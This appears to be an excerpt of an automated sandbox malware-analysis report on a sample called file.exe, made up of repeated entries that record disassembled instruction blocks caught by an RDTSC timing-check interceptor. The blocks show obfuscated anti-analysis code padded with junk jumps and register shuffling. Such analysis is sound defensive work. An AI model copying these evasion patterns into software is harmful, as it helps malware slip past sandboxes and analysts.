Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1239 second address: 73E124D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E124D second address: 73E125E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E125E second address: 73E126E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21AFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E126E second address: 73E12AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+18h], eax 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F9CD8E6598Fh 0x00000017 and ecx, 7FD4461Eh 0x0000001d jmp 00007F9CD8E65999h 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E12AF second address: 73E12E8 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 248293E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+1Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F9CD8F21AFFh 0x00000015 call 00007F9CD8F21B08h 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E12E8 second address: 73E1357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F9CD8E6598Ch 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [edx+1Ch], eax 0x00000011 jmp 00007F9CD8E65991h 0x00000016 mov eax, dword ptr [esi+20h] 0x00000019 jmp 00007F9CD8E6598Eh 0x0000001e mov dword ptr [edx+20h], eax 0x00000021 pushad 0x00000022 mov edx, eax 0x00000024 mov bx, ax 0x00000027 popad 0x00000028 mov eax, dword ptr [esi+24h] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx ebx, cx 0x00000031 pushfd 0x00000032 jmp 00007F9CD8E6598Ah 0x00000037 jmp 00007F9CD8E65995h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1357 second address: 73E135D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E135D second address: 73E1361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1361 second address: 73E1400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e call 00007F9CD8F21B01h 0x00000013 pushfd 0x00000014 jmp 00007F9CD8F21B00h 0x00000019 xor cx, 8728h 0x0000001e jmp 00007F9CD8F21AFBh 0x00000023 popfd 0x00000024 pop esi 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+28h] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F9CD8F21B05h 0x00000030 add ch, 00000046h 0x00000033 jmp 00007F9CD8F21B01h 0x00000038 popfd 0x00000039 popad 0x0000003a mov dword ptr [edx+28h], eax 0x0000003d jmp 00007F9CD8F21AFAh 0x00000042 mov ecx, dword ptr [esi+2Ch] 0x00000045 jmp 00007F9CD8F21B00h 0x0000004a mov dword ptr [edx+2Ch], ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov edx, 2CC66930h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1400 second address: 73E150A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 42E86206h 0x00000008 pushfd 0x00000009 jmp 00007F9CD8E65997h 0x0000000e and ax, C88Eh 0x00000013 jmp 00007F9CD8E65999h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ax, word ptr [esi+30h] 0x00000020 pushad 0x00000021 mov edi, ecx 0x00000023 mov ax, 5A8Fh 0x00000027 popad 0x00000028 mov word ptr [edx+30h], ax 0x0000002c jmp 00007F9CD8E65992h 0x00000031 mov ax, word ptr [esi+32h] 0x00000035 pushad 0x00000036 movzx esi, di 0x00000039 call 00007F9CD8E65993h 0x0000003e pushfd 0x0000003f jmp 00007F9CD8E65998h 0x00000044 sbb eax, 11C757C8h 0x0000004a jmp 00007F9CD8E6598Bh 0x0000004f popfd 0x00000050 pop esi 0x00000051 popad 0x00000052 mov word ptr [edx+32h], ax 0x00000056 jmp 00007F9CD8E6598Fh 0x0000005b mov eax, dword ptr [esi+34h] 0x0000005e jmp 00007F9CD8E65996h 0x00000063 mov dword ptr [edx+34h], eax 0x00000066 jmp 00007F9CD8E65990h 0x0000006b test ecx, 00000700h 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F9CD8E65997h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E150A second address: 73E1548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F9D4693FCE6h 0x0000000f jmp 00007F9CD8F21AFEh 0x00000014 or dword ptr [edx+38h], FFFFFFFFh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d movsx ebx, ax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1548 second address: 73E154E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E154E second address: 73E1552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1552 second address: 73E1556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1556 second address: 73E157B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9CD8F21B05h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E157B second address: 73E1590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1590 second address: 73E15A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21AFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E15A0 second address: 73E15A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E15A4 second address: 73E15E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+40h], FFFFFFFFh 0x0000000c jmp 00007F9CD8F21B07h 0x00000011 pop esi 0x00000012 jmp 00007F9CD8F21B06h 0x00000017 pop ebx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410490 second address: 74104EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov dh, FFh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F9CD8E65992h 0x00000010 push eax 0x00000011 jmp 00007F9CD8E6598Bh 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F9CD8E65996h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9CD8E65997h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74104EB second address: 74104F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74104F1 second address: 74104F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0B9E second address: 73C0BDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F9CD8F21AFCh 0x00000010 movzx ecx, dx 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007F9CD8F21AFCh 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov eax, 3DB8DBFDh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7380059 second address: 7380077 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9CD8E65993h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7380077 second address: 738007D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 738007D second address: 7380081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7380081 second address: 73800A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F9CD8F21AFBh 0x00000016 pop esi 0x00000017 mov ch, bl 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7380A4A second address: 7380A64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65996h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7380A64 second address: 7380A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9CD8F21AFBh 0x00000012 mov bl, ch 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0AB3 second address: 73C0AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0AB8 second address: 73C0B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9CD8F21B06h 0x0000000f push eax 0x00000010 jmp 00007F9CD8F21AFBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F9CD8F21B06h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F9CD8F21B08h 0x00000026 adc si, 3828h 0x0000002b jmp 00007F9CD8F21AFBh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0B31 second address: 73C0B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E65994h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0B49 second address: 73C0B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0045 second address: 73B0097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F9CD8E6598Dh 0x0000000b sbb ax, 4746h 0x00000010 jmp 00007F9CD8E65991h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007F9CD8E6598Eh 0x00000020 and esp, FFFFFFF0h 0x00000023 pushad 0x00000024 mov dx, si 0x00000027 mov si, 9839h 0x0000002b popad 0x0000002c sub esp, 44h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0097 second address: 73B009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B009B second address: 73B00A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B00A1 second address: 73B011A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F9CD8F21B00h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F9CD8F21B01h 0x00000017 sbb ax, B216h 0x0000001c jmp 00007F9CD8F21B01h 0x00000021 popfd 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F9CD8F21AFEh 0x00000029 sbb ah, 00000038h 0x0000002c jmp 00007F9CD8F21AFBh 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B011A second address: 73B0127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0127 second address: 73B012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B012B second address: 73B0131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0131 second address: 73B0144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21AFFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0144 second address: 73B0187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9CD8E65990h 0x00000010 add cl, FFFFFFF8h 0x00000013 jmp 00007F9CD8E6598Bh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b call 00007F9CD8E65996h 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0187 second address: 73B0203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a jmp 00007F9CD8F21B07h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F9CD8F21B06h 0x00000015 push eax 0x00000016 pushad 0x00000017 mov di, 1994h 0x0000001b pushfd 0x0000001c jmp 00007F9CD8F21AFDh 0x00000021 add esi, 7FCE0A56h 0x00000027 jmp 00007F9CD8F21B01h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f jmp 00007F9CD8F21AFEh 0x00000034 mov edi, dword ptr [ebp+08h] 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0203 second address: 73B027D instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b mov dword ptr [esp+24h], 00000000h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F9CD8E65997h 0x0000001a adc si, 98EEh 0x0000001f jmp 00007F9CD8E65999h 0x00000024 popfd 0x00000025 jmp 00007F9CD8E65990h 0x0000002a popad 0x0000002b lock bts dword ptr [edi], 00000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F9CD8E65997h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B027D second address: 73B0295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0295 second address: 73B02AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F9D48987B1Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9CD8E6598Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B02AF second address: 73B0308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov si, A93Bh 0x0000000f mov di, cx 0x00000012 popad 0x00000013 pop esi 0x00000014 jmp 00007F9CD8F21AFAh 0x00000019 pop ebx 0x0000001a pushad 0x0000001b mov dx, si 0x0000001e pushad 0x0000001f mov ah, 83h 0x00000021 jmp 00007F9CD8F21B05h 0x00000026 popad 0x00000027 popad 0x00000028 mov esp, ebp 0x0000002a jmp 00007F9CD8F21AFEh 0x0000002f pop ebp 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C09F7 second address: 73C09FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C09FD second address: 73C0A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9CD8F21B04h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A25 second address: 73C0A92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9CD8E65996h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F9CD8E65990h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F9CD8E6598Dh 0x0000001f pushfd 0x00000020 jmp 00007F9CD8E65990h 0x00000025 sub ecx, 74004EA8h 0x0000002b jmp 00007F9CD8E6598Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A92 second address: 73C0A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0A98 second address: 73C0A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0ECA second address: 73C0ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C0ED0 second address: 73C0F2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov cx, 0E5Dh 0x00000010 pushad 0x00000011 mov cx, AFFFh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 popad 0x00000019 push dword ptr [ebp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ebx, 34152CD0h 0x00000024 pushfd 0x00000025 jmp 00007F9CD8E65999h 0x0000002a add cl, 00000056h 0x0000002d jmp 00007F9CD8E65991h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410DD1 second address: 7410DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410DD5 second address: 7410E20 instructions: 0x00000000 rdtsc 0x00000002 call 00007F9CD8E65990h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop ecx 0x00000011 pushfd 0x00000012 jmp 00007F9CD8E65995h 0x00000017 adc esi, 433B5106h 0x0000001d jmp 00007F9CD8E65991h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410E20 second address: 7410E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9CD8F21B07h 0x00000009 adc ecx, 21EBC03Eh 0x0000000f jmp 00007F9CD8F21B09h 0x00000014 popfd 0x00000015 jmp 00007F9CD8F21B00h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F9CD8F21AFEh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410E7F second address: 7410F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9CD8E65996h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F9CD8E65990h 0x00000016 mov dl, byte ptr [ebp+14h] 0x00000019 pushad 0x0000001a mov cl, 07h 0x0000001c pushfd 0x0000001d jmp 00007F9CD8E65993h 0x00000022 or si, B5BEh 0x00000027 jmp 00007F9CD8E65999h 0x0000002c popfd 0x0000002d popad 0x0000002e mov eax, dword ptr [ebp+10h] 0x00000031 pushad 0x00000032 mov cx, ACA3h 0x00000036 mov edx, eax 0x00000038 popad 0x00000039 and dl, 00000007h 0x0000003c pushad 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410F03 second address: 7410F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9CD8F21AFCh 0x0000000a jmp 00007F9CD8F21B05h 0x0000000f popfd 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410F2F second address: 7410F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410F33 second address: 7410F62 instructions: 0x00000000 rdtsc 0x00000002 call 00007F9CD8F21AFCh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F9CD8F21AFAh 0x00000015 pop eax 0x00000016 call 00007F9CD8F21AFBh 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410F62 second address: 7410F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E65995h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410F7B second address: 7410FA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F9D48A06D65h 0x0000000e pushad 0x0000000f movsx edx, cx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9CD8F21B02h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7410FA1 second address: 7410DD1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub ecx, ecx 0x00000009 jmp 00007F9CD8E6598Dh 0x0000000e inc ecx 0x0000000f jmp 00007F9CD8E6598Eh 0x00000014 shr eax, 1 0x00000016 pushad 0x00000017 mov ebx, ecx 0x00000019 mov cx, B729h 0x0000001d popad 0x0000001e jmp 00007F9D4894AB87h 0x00000023 jne 00007F9CD8E6597Dh 0x00000025 inc ecx 0x00000026 shr eax, 1 0x00000028 jne 00007F9CD8E6597Dh 0x0000002a imul ecx, ecx, 03h 0x0000002d movzx eax, dl 0x00000030 cdq 0x00000031 sub ecx, 03h 0x00000034 call 00007F9CD8E75E7Dh 0x00000039 cmp cl, 00000040h 0x0000003c jnc 00007F9CD8E65997h 0x0000003e cmp cl, 00000020h 0x00000041 jnc 00007F9CD8E65988h 0x00000043 shld edx, eax, cl 0x00000046 shl eax, cl 0x00000048 ret 0x00000049 or edx, dword ptr [ebp+0Ch] 0x0000004c or eax, dword ptr [ebp+08h] 0x0000004f or edx, 80000000h 0x00000055 pop ebp 0x00000056 retn 0010h 0x00000059 push ebp 0x0000005a push 00000001h 0x0000005c push edx 0x0000005d push eax 0x0000005e call edi 0x00000060 mov edi, edi 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400ADC second address: 7400AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21AFCh 0x00000009 rdtsc
